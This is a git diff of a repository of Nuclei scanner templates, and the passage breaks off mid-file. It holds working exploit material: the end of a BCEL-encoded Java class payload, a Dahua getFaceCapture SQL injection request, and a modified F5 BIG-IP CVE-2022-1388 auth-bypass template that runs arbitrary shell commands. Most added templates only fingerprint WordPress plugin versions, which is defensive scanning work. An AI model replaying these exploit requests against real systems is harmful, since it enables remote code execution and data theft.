"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}} matchers: - type: word words: - - '{{randstr}}' + - "nt authority\\system" diff --git a/poc/other/Dahua_getUserInfoByUserName.yaml b/poc/other/Dahua_getUserInfoByUserName.yaml index 77936cf562..78d89c1465 100644 --- a/poc/other/Dahua_getUserInfoByUserName.yaml +++ b/poc/other/Dahua_getUserInfoByUserName.yaml @@ -1,31 +1,29 @@ id: Dahua info: - name: Dahua Smart Park Comprehensive Management Platform User_ GetUserInfoByUserName.action Account Password Disclosure Vulnerability + name: Dahua Smart Park Comprehensive Management Platform getFaceCapture SQL Injection Vulnerability author: Zero Trust Security Attack and Defense Laboratory - severity: medium + severity: high description: | - Dahua Smart Park Comprehensive Management Platform User_ API interface exists in getUserInfoByUserName.action, which leads to password leakage of the management park account + There is an SQL injection vulnerability in the getFaceCapture interface of Dahua Smart Park Comprehensive Management Platform, which allows attackers to execute arbitrary SQL statements and obtain sensitive database information through the vulnerability metadata: fofa-query: app="dahua-智慧园区综合管理平台" hunter-query: web.body="/WPMS/asset/lib/json2.js" + + http: - method: GET path: - - "{{BaseURL}}/admin/user_getUserInfoByUserName.action?userName=system" + - "{{BaseURL}}/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--%22%7D/extend/%7B%7D" matchers-condition: and matchers: - type: word part: body words: - - "loginName" - - "loginPass" + - "c4ca" - type: status status: - - 200 - -# 获取后访问地址 -# /admin/login_login.action + - 500 diff --git a/poc/other/bigip.yaml b/poc/other/bigip.yaml index 824800fadb..62a06938bc 100644 --- a/poc/other/bigip.yaml +++ b/poc/other/bigip.yaml @@ -1,30 +1,29 @@ id: CVE-2022-1388 - info: - name: F5 BIG-IP iControl - REST Auth Bypass RCE - author: dwisiswant0,Ph33r + name: F5 BIG-IP iControl REST Auth Bypass RCE | Command Parameter + author: Mrcl0wn severity: critical - description: | - F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, may allow undisclosed requests to bypass iControl REST authentication. + description: "CVE-2022-1388 is an authentication bypass vulnerability in the REST \ncomponent of BIG-IP’s iControl API that was assigned a CVSSv3 \nscore of 9.8. The iControl REST API is used for the management and \nconfiguration of BIG-IP devices. CVE-2022-1388 could be exploited \nby an unauthenticated attacker with network access to the management \nport or self IP addresses of devices that use BIG-IP. Exploitation would \nallow the attacker to execute arbitrary system commands, create and \ndelete files and disable services.\n" reference: - - https://twitter.com/GossiTheDog/status/1523566937414193153 - - https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/ + - https://github.com/alt3kx/CVE-2022-1388_PoC - https://support.f5.com/csp/article/K23605346 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388 + - https://github.com/dorkerdevil/CVE-2021-22986-Poc/blob/main/README.md + - https://github.com/horizon3ai/CVE-2022-1388/blob/main/CVE-2022-1388.py + - https://www.tenable.com/blog/cve-2022-1388-authentication-bypass-in-f5-big-ip + - https://github.com/numanturle/CVE-2022-1388/blob/main/bigip-icontrol-rest-rce.yaml classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2022-1388 cwe-id: CWE-306 metadata: shodan-query: http.title:"BIG-IP®-+Redirect" +"Server" - verified: "true" - tags: f5,bigip,cve,cve2022,rce,mirai,kev - + verified: true + tags: bigip,mirai,rce,cve,cve2022 variables: - auth: "admin:" - cmd: "echo CVE-2022-1388 | rev" - + auth_var: "admin:" + cmd_var: "{{CMD}}" requests: - raw: - | @@ -32,35 +31,27 @@ requests: Host: {{Hostname}} Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a - Authorization: Basic {{base64(auth)}} - Content-Type: application/json - - { - "command": "run", - "utilCmdArgs": "-c '{{cmd}}'" - } - - - | - POST /mgmt/tm/util/bash HTTP/1.1 - Host: localhost - Connection: keep-alive, X-F5-Auth-Token - X-F5-Auth-Token: a - Authorization: Basic {{base64(auth)}} + Authorization: Basic {{base64(auth_var)}} Content-Type: application/json { - "command": "run", - "utilCmdArgs": "-c '{{cmd}}'" + "command": "run", + "utilCmdArgs": "-c 'id;cmd_var'" } - - stop-at-first-match: true - matchers-condition: and + extractors: + - type: regex + part: body + name: result_command + group: 1 + regex: + - "\"commandResult\":\"(.*)\"" matchers: - type: word - part: body words: - "commandResult" - - "8831-2202-EVC" + - "uid=" + - "{{cmd_var}}" + - type: status + status: + - 200 condition: and - -# Enhanced by mp on 2022/05/19 diff --git a/poc/other/bitformpro.yaml b/poc/other/bitformpro.yaml new file mode 100644 index 0000000000..2a3d1d31fb --- /dev/null +++ b/poc/other/bitformpro.yaml @@ -0,0 +1,59 @@ +id: bitformpro + +info: + name: > + Bit Form Pro <= 2.6.4 - Authenticated (Subscriber+) Sensitive Information Exposure + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/efa646ee-ebee-4528-a421-09ee3dc8275a?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/bitformpro/" + google-query: inurl:"/wp-content/plugins/bitformpro/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,bitformpro,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bitformpro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bitformpro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.4') \ No newline at end of file diff --git a/poc/other/compute-links.yaml b/poc/other/compute-links.yaml new file mode 100644 index 0000000000..5a87490cbc --- /dev/null +++ b/poc/other/compute-links.yaml @@ -0,0 +1,59 @@ +id: compute-links + +info: + name: > + Compute Links <= 1.2.1 - Unauthenticated Remote File Inclusion + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1d2b78e0-1b82-4074-8051-e44dcfe3ac51?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/compute-links/" + google-query: inurl:"/wp-content/plugins/compute-links/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,compute-links,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/compute-links/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "compute-links" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.1') \ No newline at end of file diff --git a/poc/other/custom-permalinks-44331c84afd644601efc55a9e5863103.yaml b/poc/other/custom-permalinks-44331c84afd644601efc55a9e5863103.yaml new file mode 100644 index 0000000000..f6f933bf45 --- /dev/null +++ b/poc/other/custom-permalinks-44331c84afd644601efc55a9e5863103.yaml @@ -0,0 +1,59 @@ +id: custom-permalinks-44331c84afd644601efc55a9e5863103 + +info: + name: > + Custom Permalinks <= 2.6.0 - Authenticated(Editor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/97f8549a-292d-4a6d-8ec0-550467e5cf0f?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/custom-permalinks/" + google-query: inurl:"/wp-content/plugins/custom-permalinks/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,custom-permalinks,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/custom-permalinks/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "custom-permalinks" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.0') \ No newline at end of file diff --git a/poc/other/devvn-image-hotspot-269eebf1ba30b97f68098501ab57b8df.yaml b/poc/other/devvn-image-hotspot-269eebf1ba30b97f68098501ab57b8df.yaml new file mode 100644 index 0000000000..346eba4216 --- /dev/null +++ b/poc/other/devvn-image-hotspot-269eebf1ba30b97f68098501ab57b8df.yaml @@ -0,0 +1,59 @@ +id: devvn-image-hotspot-269eebf1ba30b97f68098501ab57b8df + +info: + name: > + Image Hotspot by DevVN <= 1.2.5 - Authenticated (Author+) PHP Object Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/624bdb9e-6c50-4a00-9a04-1a32c938d48b?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/devvn-image-hotspot/" + google-query: inurl:"/wp-content/plugins/devvn-image-hotspot/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,devvn-image-hotspot,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/devvn-image-hotspot/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "devvn-image-hotspot" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.5') \ No newline at end of file diff --git a/poc/other/display-a-meta-field-as-block.yaml b/poc/other/display-a-meta-field-as-block.yaml new file mode 100644 index 0000000000..825e66a72b --- /dev/null +++ b/poc/other/display-a-meta-field-as-block.yaml @@ -0,0 +1,59 @@ +id: display-a-meta-field-as-block + +info: + name: > + Meta Field Block <= 1.2.13 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/faee30bb-ba6e-4d3e-8ca1-79fd676e68f5?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/display-a-meta-field-as-block/" + google-query: inurl:"/wp-content/plugins/display-a-meta-field-as-block/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,display-a-meta-field-as-block,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/display-a-meta-field-as-block/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "display-a-meta-field-as-block" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.13') \ No newline at end of file diff --git a/poc/other/givingpress-lite.yaml b/poc/other/givingpress-lite.yaml new file mode 100644 index 0000000000..ba01719837 --- /dev/null +++ b/poc/other/givingpress-lite.yaml @@ -0,0 +1,59 @@ +id: givingpress-lite + +info: + name: > + GivingPress Lite <= 1.8.6 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/69a14e2f-442e-421c-bf5d-0bff3b822911?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/themes/givingpress-lite/" + google-query: inurl:"/wp-content/themes/givingpress-lite/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-theme,givingpress-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/givingpress-lite/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "givingpress-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.6') \ No newline at end of file diff --git a/poc/other/gutentor.yaml b/poc/other/gutentor.yaml new file mode 100644 index 0000000000..dd9a88caad --- /dev/null +++ b/poc/other/gutentor.yaml @@ -0,0 +1,59 @@ +id: gutentor + +info: + name: > + Gutentor - Gutenberg Blocks - Page Builder for Gutenberg Editor <= 3.3.5 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c3b1ff70-7e37-4f74-bd72-ecda81d13d83?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/gutentor/" + google-query: inurl:"/wp-content/plugins/gutentor/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,gutentor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/gutentor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "gutentor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3.5') \ No newline at end of file diff --git a/poc/other/hr-management.yaml b/poc/other/hr-management.yaml new file mode 100644 index 0000000000..344c9f7ef6 --- /dev/null +++ b/poc/other/hr-management.yaml @@ -0,0 +1,59 @@ +id: hr-management + +info: + name: > + Crew HRM <= 1.1.1 - Unauthenticated PHP Object Injection + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/dc3e3d47-cae3-46a6-9b60-ad1eb6b7ced7?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/hr-management/" + google-query: inurl:"/wp-content/plugins/hr-management/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,hr-management,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/hr-management/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "hr-management" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.1') \ No newline at end of file diff --git a/poc/other/imagerecycle-pdf-image-compression-76fdeef266854108ceda8d0e46474378.yaml b/poc/other/imagerecycle-pdf-image-compression-76fdeef266854108ceda8d0e46474378.yaml new file mode 100644 index 0000000000..8efe3ba27e --- /dev/null +++ b/poc/other/imagerecycle-pdf-image-compression-76fdeef266854108ceda8d0e46474378.yaml @@ -0,0 +1,59 @@ +id: imagerecycle-pdf-image-compression-76fdeef266854108ceda8d0e46474378 + +info: + name: > + ImageRecycle pdf & image compression <= 3.1.14 - Cross-Site Request in Several AJAX Actions + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a06bba7f-0259-4b87-b3fe-6ad8318fda7d?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/imagerecycle-pdf-image-compression/" + google-query: inurl:"/wp-content/plugins/imagerecycle-pdf-image-compression/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,imagerecycle-pdf-image-compression,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/imagerecycle-pdf-image-compression/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "imagerecycle-pdf-image-compression" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.1.14') \ No newline at end of file diff --git a/poc/other/imagerecycle-pdf-image-compression-7b8181a7be59fef3323111e90fb3e895.yaml b/poc/other/imagerecycle-pdf-image-compression-7b8181a7be59fef3323111e90fb3e895.yaml new file mode 100644 index 0000000000..62d6736209 --- /dev/null +++ b/poc/other/imagerecycle-pdf-image-compression-7b8181a7be59fef3323111e90fb3e895.yaml @@ -0,0 +1,59 @@ +id: imagerecycle-pdf-image-compression-7b8181a7be59fef3323111e90fb3e895 + +info: + name: > + ImageRecycle pdf & image compression <= 3.1.14 - Missing Authorization in Several AJAX Actions + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f330bf36-0a39-40d6-a075-c87fdb9dc2da?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/imagerecycle-pdf-image-compression/" + google-query: inurl:"/wp-content/plugins/imagerecycle-pdf-image-compression/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,imagerecycle-pdf-image-compression,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/imagerecycle-pdf-image-compression/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "imagerecycle-pdf-image-compression" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.1.14') \ No newline at end of file diff --git a/poc/other/kbucket-213e255d0f7bbab0012e0bbbd474a0f3.yaml b/poc/other/kbucket-213e255d0f7bbab0012e0bbbd474a0f3.yaml new file mode 100644 index 0000000000..1e9fdfdc28 --- /dev/null +++ b/poc/other/kbucket-213e255d0f7bbab0012e0bbbd474a0f3.yaml @@ -0,0 +1,59 @@ +id: kbucket-213e255d0f7bbab0012e0bbbd474a0f3 + +info: + name: > + KBucket: Your Curated Content in WordPress <= 4.1.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - 